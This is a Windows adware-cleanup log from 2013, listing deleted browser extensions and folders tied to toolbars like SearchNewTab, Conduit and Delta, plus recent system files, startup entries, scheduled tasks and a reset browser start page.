"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SeaRch-NewiTaab" deleted

"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SEarcHH-NNeWWTTaab" deleted

"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SearchNewTab" deleted

"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Searochh-NuewaTaab" deleted

"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SeArrcHH-NeewTab" deleted

"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Searrcho--NNeuwuTAbi" deleted

"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SearchNewTab" deleted

"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RegClean Pro" deleted

"C:\Users\Kim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TornTV.com" deleted

"C:\Users\Kim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FTDownloader.com" deleted

"C:\Users\Kim\AppData\Local\PutLockerDownloader" deleted

"C:\Users\Kim\AppData\Local\PackageAware" deleted

"C:\Users\Kim\AppData\Local\Conduit" deleted

"C:\Users\Kim\AppData\LocalLow\SearchNewTab" deleted

"C:\Users\Kim\AppData\LocalLow\BBrowsee2sauvee" deleted

"C:\Users\Kim\AppData\LocalLow\BrooWese22saove" deleted

"C:\Users\Kim\AppData\LocalLow\BrouwsEe2save" deleted

"C:\Users\Kim\AppData\LocalLow\Browseo2sAAviee" deleted

"C:\Users\Kim\AppData\LocalLow\Browusue2suave" deleted

"C:\Users\Kim\AppData\LocalLow\conotinuetossave" deleted

"C:\Users\Kim\AppData\LocalLow\contiinUEEtosaVe" deleted

"C:\Users\Kim\AppData\LocalLow\conTinuEtosaavee" deleted

"C:\Users\Kim\AppData\LocalLow\conytyinnuuetuoussaovvei" deleted

"C:\Users\Kim\AppData\LocalLow\safe saaVE" deleted

"C:\Users\Kim\AppData\LocalLow\SeaRch-NewiTaab" deleted

"C:\Users\Kim\AppData\LocalLow\SEarcHH-NNeWWTTaab" deleted

"C:\Users\Kim\AppData\LocalLow\SearchNewTab" deleted

"C:\Users\Kim\AppData\LocalLow\Searochh-NuewaTaab" deleted

"C:\Users\Kim\AppData\LocalLow\SeArrcHH-NeewTab" deleted

"C:\Users\Kim\AppData\LocalLow\Searrcho--NNeuwuTAbi" deleted

"C:\Users\Kim\AppData\LocalLow\Delta" deleted

"C:\Users\Kim\AppData\LocalLow\Incredibar.com" deleted

"C:\Users\Kim\AppData\LocalLow\PriceGong" deleted

"C:\Users\Kim\AppData\LocalLow\Conduit" deleted

"C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Extensions\niapdbllcanepiiimjjndipklodoedlc" deleted

"C:\Windows\SysWow64\searchplugins" deleted

"C:\Windows\SysWow64\Extensions" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\ftdownloader4@ftdownloader.com" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\euo7_vtq@rrvueetj-.org" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\beee8skl@tksdduisq.co.uk" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\pjzb@oiyo.co.uk" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\oyyikq@ouoeld.edu" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\u6rdxqq@oawewjhi.com" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\a-0ify@duayauakfin.net" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\lsua3kd@n-euyuzb.org" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\gvjoo@aaey-.net" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\ulxgj9gd5@uiqhtcx.com" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\qqbt_jw@oeiwr-.edu" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\1iwbgf@jmse.com" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\qmb7wl@sdmwieh.com" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\txj2_9uyea@opskjeay.com" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\kg08cch@iofqz.edu" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\5uayyeeii@jrzxta.org" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\pdjx@iauy.net" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\ftdownloader4@ftdownloader.com" deleted

==== Files Recently Created / Modified ======================

====== C:\Windows ====

====== C:\Users\Kim\AppData\Local\Temp ====

2013-07-24 10:26:01 35B5AF4CBE81998E87894E2F598B96C5 5632 ----atw- C:\Users\Kim\AppData\Local\Temp\_TinDel.exe

====== C:\Windows\SysWOW64 =====

2013-07-11 21:54:24 5FE2CAA3CC70C1364AE7F767EAAFFF3B 6035456 ----a-w- C:\Windows\SysWOW64\mshtml.dll

2013-07-11 21:54:18 28D3546CC3938615DCF789B8D2021B28 11020800 ----a-w- C:\Windows\SysWOW64\ieframe.dll

2013-07-11 21:54:13 674E88718A57589514EC2D7ABEE484AB 1231872 ----a-w- C:\Windows\SysWOW64\urlmon.dll

2013-07-11 21:54:13 55F50E8E3A6AFFE4708D9FDAEFDE35A9 627712 ----a-w- C:\Windows\SysWOW64\msfeeds.dll

2013-07-11 21:54:11 137FC18F3EA7AA7533210619FC88CB96 981504 ----a-w- C:\Windows\SysWOW64\wininet.dll

2013-07-11 21:54:10 1859C6956961159F94A5C90732E55216 2078208 ----a-w- C:\Windows\SysWOW64\iertutil.dll

2013-07-11 21:54:08 7241EA6F891B5AD5F92057F3A261F2BF 48128 ----a-w- C:\Windows\SysWOW64\jsproxy.dll

2013-07-11 21:54:08 51C3407ED17F85672CDB5EF51E7A1CC5 67584 ----a-w- C:\Windows\SysWOW64\mshtmled.dll

2013-07-11 21:54:08 507D2E49E454733C751E8F87B6ADCA19 132096 ----a-w- C:\Windows\SysWOW64\url.dll

2013-07-11 21:54:08 00B32C6614B26E721325E1F4DD8AA133 176640 ----a-w- C:\Windows\SysWOW64\ieui.dll

2013-07-11 21:54:07 417F67116DAEED871EA9D1F7C1EB04FA 1638912 ----a-w- C:\Windows\SysWOW64\mshtml.tlb

2013-07-11 21:53:59 56D61BE56DA22334829E14CDE6A8C1FE 1620480 ----a-w- C:\Windows\SysWOW64\WMVDECOD.DLL

2013-07-11 21:53:57 674EB817CF6E43B7DF3EC26E06E98D98 509440 ----a-w- C:\Windows\SysWOW64\qedit.dll

2013-07-11 21:53:02 1C0E369575F387460E2A5F28269B2CC4 1247744 ----a-w- C:\Windows\SysWOW64\DWrite.dll

====== C:\Windows\SysWOW64\drivers =====

====== C:\Windows\Sysnative =====

2013-07-11 21:54:25 24405172225C37271E31C41A9FECF9FE 9070080 ----a-w- C:\Windows\Sysnative\mshtml.dll

2013-07-11 21:54:22 C8D00FA79EFA3FCC789EE321AA76D559 12295680 ----a-w- C:\Windows\Sysnative\ieframe.dll

2013-07-11 21:54:14 E300DBCB3315CBA0EFC3FB41B62EFFE2 1492992 ----a-w- C:\Windows\Sysnative\urlmon.dll

2013-07-11 21:54:12 FF49C4891CD5A4D4107C23E70FF49544 2458112 ----a-w- C:\Windows\Sysnative\iertutil.dll

2013-07-11 21:54:12 5285BD77AD596B645150073F61EC8466 1188864 ----a-w- C:\Windows\Sysnative\wininet.dll

2013-07-11 21:54:12 0F6FF32E5650E44213D8E1D09674C19F 735232 ----a-w- C:\Windows\Sysnative\msfeeds.dll

2013-07-11 21:54:10 0CEF6E7ED1A6A35F504ADF970E47BB1B 97792 ----a-w- C:\Windows\Sysnative\mshtmled.dll

2013-07-11 21:54:09 98B35D338CF52256BDB6C0524A68036F 247808 ----a-w- C:\Windows\Sysnative\ieui.dll

2013-07-11 21:54:08 BD2D47FD178F086C3D83461C37B08638 134144 ----a-w- C:\Windows\Sysnative\url.dll

2013-07-11 21:54:08 B3F8960D1109394828CDCB02DAB03725 64512 ----a-w- C:\Windows\Sysnative\jsproxy.dll

2013-07-11 21:54:06 B1E8B5AED1AA674355A58E42091FB67A 1638912 ----a-w- C:\Windows\Sysnative\mshtml.tlb

2013-07-11 21:54:00 8B6CBE2FA2BAEDE2A3F5C96733481911 1887744 ----a-w- C:\Windows\Sysnative\WMVDECOD.DLL

2013-07-11 21:53:57 A3EC566925BEC505E2418C1AC14E541E 624128 ----a-w- C:\Windows\Sysnative\qedit.dll

2013-07-11 21:53:30 73601028E7C44154318AE91D2EB2EDB3 3153920 ----a-w- C:\Windows\Sysnative\win32k.sys

2013-07-11 21:53:03 DD85F00EC31F77315AE992B7B0411D65 1643520 ----a-w- C:\Windows\Sysnative\DWrite.dll

====== C:\Windows\Sysnative\drivers =====

2013-06-27 22:40:43 E86C64478D9A90D62255FE9EB0150C6E 175 ----a-w- C:\Windows\Sysnative\drivers\aswVmm.sys.sum

2013-06-27 06:18:24 A5F29AC2F0ADE8B995B49D7350CE3AC0 175 ----a-w- C:\Windows\Sysnative\drivers\aswSP.sys.sum

2013-06-27 06:18:24 2E83D2621E87C493AB45DC6655BA77D4 175 ----a-w- C:\Windows\Sysnative\drivers\aswSnx.sys.sum

====== C:\Windows\Tasks ======

2013-07-24 10:26:00 CA67EA86DEC39648A65E8A200D1309E7 3294 ----a-w- C:\Windows\Sysnative\Tasks\4470

2013-07-24 10:25:58 0395EDD724B994404FB7791E10C63A11 3214 ----a-w- C:\Windows\Sysnative\Tasks\0

====== C:\Windows\Temp ======

======= C:\Program Files =====

======= C:\Program Files (x86) =====

2013-07-16 21:53:51 -------- d-----w- C:\Program Files (x86)\Trend Micro

2013-07-10 15:01:39 -------- d-----w- C:\Program Files (x86)\Microsoft XNA

2013-06-30 11:31:16 -------- d-----w- C:\Program Files (x86)\Shop-N-Spree_Family Fortune

======= C: =====

====== C:\Users\Kim\AppData\Roaming ======

2013-07-19 12:06:27 -------- d-----w- C:\users\Kim\AppData\Locallow\Hammer Labs

2013-07-10 15:02:25 -------- d-----w- C:\users\Kim\AppData\Roaming\Nekobolt

2013-07-09 21:13:50 -------- d-----w- C:\users\Kim\AppData\Roaming\Liam games

2013-07-09 11:22:24 -------- d-----w- C:\users\Kim\AppData\Roaming\Flood Light Games

2013-07-04 15:16:19 -------- d-----w- C:\users\Kim\AppData\Roaming\HipSoft

2013-07-04 06:06:01 -------- d-----w- C:\users\Kim\AppData\Roaming\Corpatros

2013-06-27 22:43:41 -------- d-----w- C:\users\Kim\AppData\Locallow\AdoreGames

====== C:\Users\Kim ======

2013-07-20 11:54:40 FE41602EF04FFA78279AD505B05EA61B 414208 ----a-w- C:\Users\Kim\Green City Deluxe\JNGLoad.dll

2013-07-20 11:54:40 E4450E7FD70C4C576A299B5BA945DEA7 491520 ----a-w- C:\Users\Kim\Green City Deluxe\Squall.dll

2013-07-20 11:54:40 17B3A87E564520B0680027DB88C433EF 12017664 ----a-w- C:\Users\Kim\Green City Deluxe\GreenCityDeluxe.exe

2013-07-20 11:54:33 -------- d-----w- C:\Users\Kim\Green City Deluxe

2013-07-10 14:59:35 A7B377B8C0162FB49EDC8AA50C170E14 3690 ----a-w- C:\Users\Kim\Baking Success\d3dx9.dll

2013-07-10 14:59:35 6DED8FCBF5F1D9E422B327CA51625E24 462336 ----a-w- C:\Users\Kim\Baking Success\Ionic.Zip.dll

2013-07-10 14:59:32 9BC4C6CA8B8BE24D64127687CB2F1DAB 1458688 ---ha-w- C:\Users\Kim\Baking Success\BakingSuccess.exe

2013-07-10 14:59:32 304E20ABECCB14B053DB6B97EC2E1480 832726 ----a-w- C:\Users\Kim\Baking Success\BSLauncher.exe

2013-07-10 14:59:32 -------- d-----w- C:\Users\Kim\Baking Success

2013-07-09 21:11:06 -------- d-----w- C:\Users\Kim\Sweet Kingdom - Betoverde Prinses

2013-07-09 11:22:24 -------- d-----w- C:\ProgramData\Flood Light Games

2013-06-30 11:31:37 -------- d-----w- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Shop-N-Spree_Family Fortune

2013-06-26 09:46:52 -------- d-----w- C:\ProgramData\NannyMania

====== C: exe-files ==

2013-07-24 10:26:01 35B5AF4CBE81998E87894E2F598B96C5 5632 ----atw- C:\Users\Kim\AppData\Local\Temp\_TinDel.exe

2013-07-20 11:54:40 17B3A87E564520B0680027DB88C433EF 12017664 ----a-w- C:\Users\Kim\Green City Deluxe\GreenCityDeluxe.exe

2013-07-20 11:18:35 31D0FEB496FDE11B73BE4FBC8D49572F 315904 ----a-w- C:\Users\Kim\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7M3KVIC7\v924[1].exe

2013-07-20 11:18:34 31D0FEB496FDE11B73BE4FBC8D49572F 315904 ----a-w- C:\Users\Kim\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\PU5EE5L0\GroeyticDL.rar[1].exe

2013-07-19 12:05:34 E3A105FD7539A863DE8E36195D541F6F 454757 ----a-w- C:\$Recycle.Bin\S-1-5-21-1635193343-2580408697-3417977720-1000\$RVIRJ21\Uninstall.exe

2013-07-19 12:05:29 AC6A0F9EC8B316158A9D7CC20EF9B3A4 12126008 ----a-w- C:\$Recycle.Bin\S-1-5-21-1635193343-2580408697-3417977720-1000\$RVIRJ21\FarmForYourLife.exe

2013-07-18 03:27:16 503B3C3C8DED6110C01FEBDA7918FE72 4278072 ----a-w- C:\$Recycle.Bin\S-1-5-21-1635193343-2580408697-3417977720-1000\$RBLQF9C\SacraTerra_KissofDeath_CE.exe

=== C: other files ==

2013-07-24 10:32:27 A57DCD540BD752733B1119E07A6C60E2 125592311 ----a-w- C:\Users\Public\Desktop\sample_24-07-2013_1231.zip

2013-07-19 22:46:07 95125CDB81059005550903555D37CFE6 79979 ----a-w- C:\Users\Kim\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\EA5QVW93\nos[1].zip

==== Startup Registry Enabled ======================

[HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run]

"Sidebar"="%ProgramFiles%\Windows\Sidebar.exe /autoRun"

[HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run]

"Sidebar"="%ProgramFiles%\Windows\Sidebar.exe /autoRun"

[HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Windows\CurrentVersion\Run]

"IndxStoreSvr_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"="C:\Program Files (x86)\Common Files\Nero\Lib\NMIndexStoreSvr.exe ASO-616B5711-6DAE-4795-A05F-39A1E5104020"

"Spotify Web Helper"="C:\Users\Kim\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"

"Spotify"="C:\Users\Kim\AppData\Roaming\Spotify\Spotify.exe /uri spotify:autostart"

[HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\RunOnce]

"mctadmin"="C:\Windows\System32\mctadmin.exe"

[HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\RunOnce]

"mctadmin"="C:\Windows\System32\mctadmin.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"Adobe ARM"="C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"

"NBKeyScan"="C:\Program Files (x86)\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"

"avast"="C:\Program Files\AVAST Software\Avast\avastUI.exe /nogui"

"HP Software Update"="C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe"

"SunJavaUpdateSched"="C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]

"IndxStoreSvr_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"="C:\Program Files (x86)\Common Files\Nero\Lib\NMIndexStoreSvr.exe ASO-616B5711-6DAE-4795-A05F-39A1E5104020"

"Spotify Web Helper"="C:\Users\Kim\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"

"Spotify"="C:\Users\Kim\AppData\Roaming\Spotify\Spotify.exe /uri spotify:autostart"

==== Startup Folders ======================

2012-11-14 20:24:51 2111 ----a-w- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk

==== Task Scheduler Jobs ======================

C:\Windows\tasks\Adobe Flash Player Updater.job --a------ C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [12-06-2013 10:35]

C:\Windows\tasks\AutoKMS.job --a------ C:\Windows\AutoKMS\AutoKMS.exe []

C:\Windows\tasks\DLL-files.com Fixer_MONTHLY.job --a------ C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe []

C:\Windows\tasks\DLL-files.com Fixer_UPDATES.job --a------ C:\Program Files (x86)\Dll-Files.com Fixer\DLLFixer.exe []

C:\Windows\tasks\GoogleUpdateTaskMachineCore.job --a------ :C:\Program Files (x86)\Google\Update\GoogleUpdate.exe []

C:\Windows\tasks\GoogleUpdateTaskMachineUA.job --a------ C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [14-03-2013 21:36]

==== Firefox Extensions ======================

ProfilePath: C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default

- SEarcHH-NNeWWTTaab - %ProfilePath%\extensions\cjcdqvyuyu@odwkhl.net

- SearchNewTab - %ProfilePath%\extensions\gfhxfl2x@tvcsrjdwve.edu

- SearchNewTab - %ProfilePath%\extensions\heynw@cgcypvwqx.co.uk

- BBrowsee2sauvee - %ProfilePath%\extensions\nfbednr@uuyy-.org

- SearchNewTab - %ProfilePath%\extensions\usdwqwcn@xpek-.co.uk

- GoPhotoIt - %ProfilePath%\extensions\gophoto@gophoto.it.xpi

- leethax.net extension - %ProfilePath%\extensions\leethax@leethax.net.xpi

==== Firefox Plugins ======================

==== Deleting Files \ Folders ======================

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\gophoto@gophoto.it.xpi" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\nfbednr@uuyy-.org" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\cjcdqvyuyu@odwkhl.net" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\gfhxfl2x@tvcsrjdwve.edu" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\heynw@cgcypvwqx.co.uk" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\usdwqwcn@xpek-.co.uk" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\gfhxfl2x@tvcsrjdwve.edu" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\heynw@cgcypvwqx.co.uk" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\usdwqwcn@xpek-.co.uk" deleted

==== Chrome Look ======================

HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions

bebnnlollpcjnfpkafhoclljaojgnfok - C:\Program Files (x86)\FTDownloader.com\FTDownloader10.crx[]

kiplfnciaokpcennlkldkdaeaaomamof - C:\Users\Kim\AppData\Local\Torch\Plugins\TorchPlugin.crx[09-04-2013 18:30]

nbmafkdmkkckhggblphicnnhlgljnoje - C:\Program Files (x86)\TornTV.com\torn2_10.crx[]

pfmopbbadnfoelckkcmjjeaaegjpjjbk - C:\Program Files (x86)\Gophoto.it\gophotoit14.crx[]

YrJie New Games - Kim - Default\Extensions\adcihdnhajancggcokdfooepphmbdhbc

conotinuetossave - Kim - Default\Extensions\aeppokiabpjfjgknamjffpeapjcafdhn

FTdownloader V4.0 - Kim - Default\Extensions\bebnnlollpcjnfpkafhoclljaojgnfok

Browseo2sAAviee - Kim - Default\Extensions\bncjpbfanaacoelcmbiaimdglhmgmcdj

SEarcHH-NNeWWTTaab - Kim - Default\Extensions\bpknhdbhdnodicohjlfebkpebjodecdl

Searochh-NuewaTaab - Kim - Default\Extensions\dkchjjdjclihhfkfjhhaicbjljmjkmem

SeArrcHH-NeewTab - Kim - Default\Extensions\elakllhigfdgmoehgfdhjajmaepongcn

Delta Toolbar - Kim - Default\Extensions\eooncjejnppfjjklapaamhcdmjbilmde

BBrowsee2sauvee - Kim - Default\Extensions\fhdglmcbhpnhplcoicbpadoneebojnae

Browusue2suave - Kim - Default\Extensions\hioaakbfenfbkollmepcamaokbpekbmg

SearchNewTab - Kim - Default\Extensions\hjeahffmgabhbkgimcdagfphmmcingcl

safe saaVE - Kim - Default\Extensions\ielleeokpkifhpgognmjlkanbpoomgjh

SEarcHH-NNeWWTTaab - Kim - Default\Extensions\imdghejbhnmlmdloolcphkpolkfmbamm

BrouwsEe2save - Kim - Default\Extensions\jinaccnjmpmodnkincmgpbhehijlghal

conytyinnuuetuoussaovvei - Kim - Default\Extensions\jjaikkpohpedfidoijnciaccfjfdllho

Torch Share - Kim - Default\Extensions\kiplfnciaokpcennlkldkdaeaaomamof

Searrcho--NNeuwuTAbi - Kim - Default\Extensions\kmamjampngeblhpfpnhohgiaofcceajo

SearchNewTab - Kim - Default\Extensions\liljbdeckhecpkedcfmncnlpmpccjffo

SearchNewTab - Kim - Default\Extensions\lolljfbphbmjhacmhljednodjjmlmiph

BBrowsee2sauvee - Kim - Default\Extensions\lpfdokejajpkbpbgledjcdhpebpdddej

SearchNewTab - Kim - Default\Extensions\meeimebkpppihgnjelgcnegokipmfkjh

Torntv 2 - Kim - Default\Extensions\nbmafkdmkkckhggblphicnnhlgljnoje

BrooWese22saove - Kim - Default\Extensions\njdmppafldbhmfcmmfblhlbmpinbmekn

contiinUEEtosaVe - Kim - Default\Extensions\oldkgccoalakmkocaknfiohncdpgciic

GoPhoto.it - Kim - Default\Extensions\pfmopbbadnfoelckkcmjjeaaegjpjjbk

==== Chrome Fix ======================

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Extensions\lpfdokejajpkbpbgledjcdhpebpdddej deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_lpfdokejajpkbpbgledjcdhpebpdddej_0.localstorage deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_lpfdokejajpkbpbgledjcdhpebpdddej_0.localstorage-journal deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Extensions\njdmppafldbhmfcmmfblhlbmpinbmekn deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_njdmppafldbhmfcmmfblhlbmpinbmekn_0.localstorage deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_njdmppafldbhmfcmmfblhlbmpinbmekn_0.localstorage-journal deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Extensions\jinaccnjmpmodnkincmgpbhehijlghal deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_jinaccnjmpmodnkincmgpbhehijlghal_0.localstorage deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_jinaccnjmpmodnkincmgpbhehijlghal_0.localstorage-journal deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Extensions\bncjpbfanaacoelcmbiaimdglhmgmcdj deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_bncjpbfanaacoelcmbiaimdglhmgmcdj_0.localstorage deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_bncjpbfanaacoelcmbiaimdglhmgmcdj_0.localstorage-journal deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Extensions\hioaakbfenfbkollmepcamaokbpekbmg deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_hioaakbfenfbkollmepcamaokbpekbmg_0.localstorage deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_hioaakbfenfbkollmepcamaokbpekbmg_0.localstorage-journal deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Extensions\aeppokiabpjfjgknamjffpeapjcafdhn deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Extensions\oldkgccoalakmkocaknfiohncdpgciic deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Extensions\jjaikkpohpedfidoijnciaccfjfdllho deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_jjaikkpohpedfidoijnciaccfjfdllho_0.localstorage deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_jjaikkpohpedfidoijnciaccfjfdllho_0.localstorage-journal deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Extensions\ielleeokpkifhpgognmjlkanbpoomgjh deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Extensions\imdghejbhnmlmdloolcphkpolkfmbamm deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_imdghejbhnmlmdloolcphkpolkfmbamm_0.localstorage deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_imdghejbhnmlmdloolcphkpolkfmbamm_0.localstorage-journal deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Extensions\hjeahffmgabhbkgimcdagfphmmcingcl deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkchjjdjclihhfkfjhhaicbjljmjkmem deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_dkchjjdjclihhfkfjhhaicbjljmjkmem_0.localstorage deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_dkchjjdjclihhfkfjhhaicbjljmjkmem_0.localstorage-journal deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Extensions\elakllhigfdgmoehgfdhjajmaepongcn deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_elakllhigfdgmoehgfdhjajmaepongcn_0.localstorage deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_elakllhigfdgmoehgfdhjajmaepongcn_0.localstorage-journal deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Extensions\kmamjampngeblhpfpnhohgiaofcceajo deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_kmamjampngeblhpfpnhohgiaofcceajo_0.localstorage deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_kmamjampngeblhpfpnhohgiaofcceajo_0.localstorage-journal deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Extensions\bebnnlollpcjnfpkafhoclljaojgnfok deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Extensions\nbmafkdmkkckhggblphicnnhlgljnoje deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Extensions\pfmopbbadnfoelckkcmjjeaaegjpjjbk deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Extensions\eooncjejnppfjjklapaamhcdmjbilmde deleted successfully

C:\Users\Kim\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_eooncjejnppfjjklapaamhcdmjbilmde_0.localstorage deleted successfully

==== Set IE to Default ======================

Old Values:

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]

"Start Page"="Google"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]

"Start Page"="Search"

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main]

"Start Page"="Search"

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]

"DefaultScope"="{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}"

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}] not found

New Values:

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]

"Start Page"="Google"

